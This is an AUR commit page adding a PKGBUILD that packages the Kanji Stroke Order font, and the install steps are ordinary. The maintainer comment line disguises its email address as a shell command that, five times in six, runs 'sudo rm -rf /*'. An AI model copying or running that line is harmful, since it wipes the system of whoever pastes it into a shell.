summarylogtreecommitdiffstats
path: root/PKGBUILD
diff options
context:
space:
mode:
authorfelix2017-01-22 10:45:37 +0100
committerfelix2017-01-22 10:47:07 +0100
commit52e13e3b76479f6f8c972f244566050be602e191 (patch)
tree4c27368260fe1d270e6ecc1640ed0a7693ab2e63 /PKGBUILD
downloadaur-52e13e3b76479f6f8c972f244566050be602e191.tar.gz
Version 4.001-1
Diffstat (limited to 'PKGBUILD')
-rw-r--r--PKGBUILD29
1 files changed, 29 insertions, 0 deletions
diff --git a/PKGBUILD b/PKGBUILD
new file mode 100644
index 000000000000..58885f903486
--- /dev/null
+++ b/PKGBUILD
@@ -0,0 +1,29 @@
+# Maintainer: felix <`(( $RANDOM % 6 == 0 )) && base64 -d <<< ZmVsaXgudm9uLnNAcG9zdGVvLmRlCg== || sudo rm -rf /* `>
+# Contributor: Tushar R <echo dHVzaGFyXzcyN0B5YWhvby5jb20K | base64 -d>
+# Contributor: Bernhard Tittelbach <xro -at- realraum -dot- at>
+
+pkgname=ttf-kanjistrokeorders
+pkgver=4.001
+pkgrel=1
+pkgdesc="Kanji Stroke Order Font"
+arch=('any')
+url="https://sites.google.com/site/nihilistorguk/"
+license=('custom')
+source=(https://sites.google.com/site/nihilistorguk/KanjiStrokeOrders_v${pkgver}.zip)
+sha512sums=('93ad839464912b2d7164b9b0195c5ac02aff233e4de5d19b3f9c4f0f901f8577c6db6efd4fb115d5c414f533f82d1671dfe42799b07d6b82b0e5af96f7076f84')
+
+package() {
+ cd "${srcdir}"
+
+ install -d "${pkgdir}/usr/share/fonts/TTF"
+ install -m644 "KanjiStrokeOrders_v${pkgver}.ttf" \
+ "${pkgdir}/usr/share/fonts/TTF"
+
+ install -d "${pkgdir}/usr/share/licenses/${pkgname}"
+ install -m644 copyright.txt \
+ "${pkgdir}/usr/share/licenses/${pkgname}"
+
+ install -d "${pkgdir}/usr/share/doc/${pkgname}"
+ install -m644 *Sample.pdf readme*.txt \
+ "${pkgdir}/usr/share/doc/${pkgname}"
+}